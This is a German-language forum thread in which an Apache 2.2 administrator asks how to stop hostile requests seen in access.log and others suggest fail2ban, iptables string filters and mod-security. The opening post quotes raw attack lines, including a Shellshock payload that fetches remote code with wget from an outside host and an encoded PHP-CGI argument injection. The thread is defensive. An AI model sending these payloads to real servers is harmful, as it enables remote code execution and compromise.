[gelöst] Logfile Einträge verhindern

[Piepnase]

Hallo zusammen,

wie kann ich solche Einträge meiner "access.log" im Apache 2.2 von vornherein blocken?

Code: Alles auswählen

GET /cgi-bin/index2.cgi HTTP/1.1" 301 477 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://pinkfashion.dk/log.c -O /tmp/log.c;$

GET / HTTP/1.0" 301 457 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)

CONNECT 163mx02.mxmail.netease.com:25 HTTP/1.0" 301 457 "-" "-

POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%$

\x01R\xbb\xfa\x88\xeb\xe3R<\x18\xf8e\x1e\x04\xc0K\xea\xf4c\x9d\xddw\xc5\xdbp\x14\xb0\xde\\\x9f\xce\x16\xeb" 301 229 "-" "-

Besten Dank im Voraus

[rendegast]

access.log wird wohl von rsyslog beschickt.

Ich habe sowas in /etc/rsyslog.d/blafoo.conf

Code: Alles auswählen

:msg,regex,"to [1-3][0-9] Celsius"                      ~

systemd-journald habe ich sowas noch nicht nachgeforscht.
Da wird bisher eher die Ausgabe von 'journalctl' gefiltert.


-----------------------------------------------------------------------------------------
EDIT
Aua, habe access.log mit auth.log verwechselt,
und mich schon ob der ungewöhnlichen Einträge gewundert

[DeletedUserReAsG]

Wird access.log nicht vom jeweiligen httpd (welcher hier verwendet wird, wird ja mal wieder nicht verraten) beschickt? Zumindest gibt es keine Abhängigkeiten zum Initsystem oder einem logd.

[Piepnase]

Der Webserver ist ein Apache und ja, die access.log wird vom Webserver befüllt

[DeletedUserReAsG]

Und du möchtest gerade die Einträge, die man normalerweise im Log haben will, nicht haben? Ich meine: beim Anschauen kann man sie ja rausgreppen, wenn sie stören. Aber für forensische Zwecke und Fehlersuchen möchten die meisten anderen Leute halt doch haben. Immerhin hat ’n Log informativ und vollständig zu sein und nicht hübsch auszusehen. Viel mehr, als die Doku zum Logging hergibt, wird sich deswegen ohne großes Basteln oder schmutzige Hacks wohl auch nicht machen lassen.

[Piepnase]

Okay, falsch ausgedrückt (die Logfile sollen natürlich nicht hübsch aussehen, sondern zeigen was Sache ist!):
Wollte wissen, wie ich verhindern kann, dass solche Trolle Erfolg haben. Habe jetzt auch schon eine Lösung mit iptables gefunden, die ich morgen einrichten werde.
Danke allen für ihre Antworten

[DeletedUserReAsG]

Wollte wissen, wie ich verhindern kann, dass solche Trolle Erfolg haben.

Ach, so war das gemeint, sorry. Von vorneherein wird sich da nichts machen lassen (es sei denn, via DPI [wovon ich wiederum ’n Gegner bin {aus Datenschutzgründen, und weil’s spätestens bei https eh nicht mehr tut}]), denn bevor das Paket nicht empfangen worden ist, weiß man ja nicht, dass der Inhalt unerwünscht ist. Als Erfolg würde ich das nun auch nicht gerade sehen – das sähe im Log wohl anders aus.

Manche Leute basteln sich was via etwa fail2ban, um die IP nach dem ersten Versuch für eine Weile zu blocken.

[Piepnase]

Fail2ban habe ich im Einsatz, aber die Trolle kommen ja mit dynamischen IPs. Also spätestens am nächsten Tag sind sie wieder da. Ich werde das jetzt in iptables mit dem Parameter String erledigen, so kicke ich zumindest die immer wiederkehrenden Besucher, wie "Ringing at your dorbell", pinkfashion.dk oder die CGI und Shellshock-Digger raus.

[rendegast]

Vielleicht mod-security?
libapache2-mod-security2
modsecurity-crs

[Piepnase]

Habe in iptables ein paar regeln hinzugefügt, die auf den String filtern